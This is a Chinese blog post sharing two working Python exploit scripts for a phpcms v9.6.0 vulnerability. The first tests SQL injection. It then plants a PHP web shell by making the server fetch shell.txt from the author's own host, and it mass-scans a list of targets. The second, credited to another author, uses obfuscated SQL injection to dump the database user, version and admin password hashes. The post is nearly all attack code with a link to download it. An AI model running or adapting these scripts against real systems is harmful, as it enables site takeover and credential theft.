![pcms 图片[2]-phpcmsV9.6.0注入+前台getshell-华盟网](https://www.77169.net/wp-content/uploads/2017/10/pcms-678x381.png)
背景就稍微说一下：Yan牛发现撞了洞，一时生气便把已经流传很久的phpcms v9.6.0前台getshell漏洞发了出来。看到chamd5团队发的文章时，复现了一下，贴点代码上来，顺便回应一下法师说的“多写博客”=。=
直接贴代码会比较好一点：
# phpcms v9.6.0 sqli and getshell
# code by : whoam1
# blog : http://www.cnnetarmy.com
import requests
import random
import string
import hashlib
import re
import threading
def sqli(host):
try:
url1 = ‘{}/index.php?m=wap&c=index&a=int&siteid=1’.format(host)
s =requests.Session()
req = s.get(url1)
flag = ”.join([random.choice(string.digits) for _ in range(2)])
flag_hash = hashlib.md5(flag).hexdigest()
url2 = ‘{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26’.format(host,flag)
cookie = requests.utils.dict_from_cookiejar(s.cookies)
cookies = re.findall(r“siteid’: ‘(.*?)'”,str(cookie))[0]
data = {“userid_flash”:cookies}
r = s.post(url=url2,data=data)
a_k = r.headers[‘Set-Cookie’][61:]
url3 = ‘{}/index.php?m=content&c=down&a_k={}’.format(host,a_k)
if flag_hash[16:] in s.get(url3).content:
print ‘[*] SQL injection Ok!’
else:
print ‘[!] SQL injection ERROR.’
except:
print ‘requests error.’
pass
def getshell(host):
try:
url = ‘%s/index.php?m=member&c=index&a=register&siteid=1’ % host
flag = ”.join([random.choice(string.lowercase) for _ in range(8)])
flags = ”.join([random.choice(string.digits) for _ in range(8)])
headers = {
‘Accept’:‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’,
‘Accept-Encoding’:‘gzip, deflate’,
‘Accept-Language’:‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3’,
‘Upgrade-Insecure-Requests’:‘1’,
‘Content-Type’: ‘application/x-www-form-urlencoded’,
‘User-Agent’:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0’}
data = “siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=”.format(flag,flags,flag)
r = requests.post(url=url,headers=headers,data=data,timeout=5)
#print r.content
shell_path = re.findall(r‘lt;img src=(.*?)>’,str(r.content))[0]
print ‘[*] shell: %s | pass is: cmd’ % shell_path
with open(‘sql_ok.txt’,‘a’)as tar:
tar.write(shell_path)
tar.write(‘\n’)
except:
print ‘requests error.’
pass
if __name__ == ‘__main__’:
#sqli(‘http://127.0.0.1/phpcms960/install_package’)
#getshell(‘http://127.0.0.1/phpcms960/install_package’)
tsk = []
f = open(‘target.txt’,‘r’)
for i in f.readlines():
url = i.strip()
t = threading.Thread(target = sqli,args = (url,))
tsk.append(t)
for t in tsk:
t.start()
t.join(0.1)
另附上luan表哥的另一个脱库脚本：
import requests,sys,urllib
url = sys.argv[1]
print ‘Phpcms v9.6.0 SQLi Exploit Code By Luan’
sqli_prefix = ‘%*27an*d%20’
sqli_info = ‘e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))’
sqli_password1 = ‘e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om ‘
sqli_password2 = ‘_admin li*mit 0,1)x))’
sqli_padding = ‘%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6’
setp1 = url + ‘/index.php?m=wap&a=index&siteid=1’
cookies = {}
for c in requests.get(setp1).cookies:
if c.name[–7:] == ‘_siteid’:
cookie_head = c.name[:6]
cookies[cookie_head+‘_userid’] = c.value
cookies[c.name] = c.value
print ‘[+] Get Cookie : ‘ + str(cookies)
setp2 = url + ‘/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=’ + sqli_prefix + urllib.quote_plus(sqli_info, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[–9:] == ‘_att_json’:
sqli_payload = c.value
print ‘[+] Get SQLi Payload : ‘ + sqli_payload
setp3 = url + ‘/index.php?m=content&c=down&a_k=’ + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print ‘[+] Get SQLi Output : ‘ + html.split(‘luan$’)[1]
table_prefix = html[html.find(‘_download_data’)–2:html.find( ‘_download_data’)]
print ‘[+] Get Table Prefix : ‘ + table_prefix
setp2 = url + ‘/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=’ + sqli_prefix + urllib.quote_plus(sqli_password1, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + table_prefix + urllib.quote_plus(sqli_password2, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[–9:] == ‘_att_json’:
sqli_payload = c.value
print ‘[+] Get SQLi Payload : ‘ + sqli_payload
setp3 = url + ‘/index.php?m=content&c=down&a_k=’ + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print ‘[+] Get SQLi Output : ‘ + html.split(‘luan$’)[1]
本程序带有随机性，使用前请先做无损验证。完整地址：http://www.cnnetarmy.com/soft/phpcmsv9.6_sqli+getshell.py
作者：whoam1（QQ：2069698797），出自：http://www.cnnetarmy.com/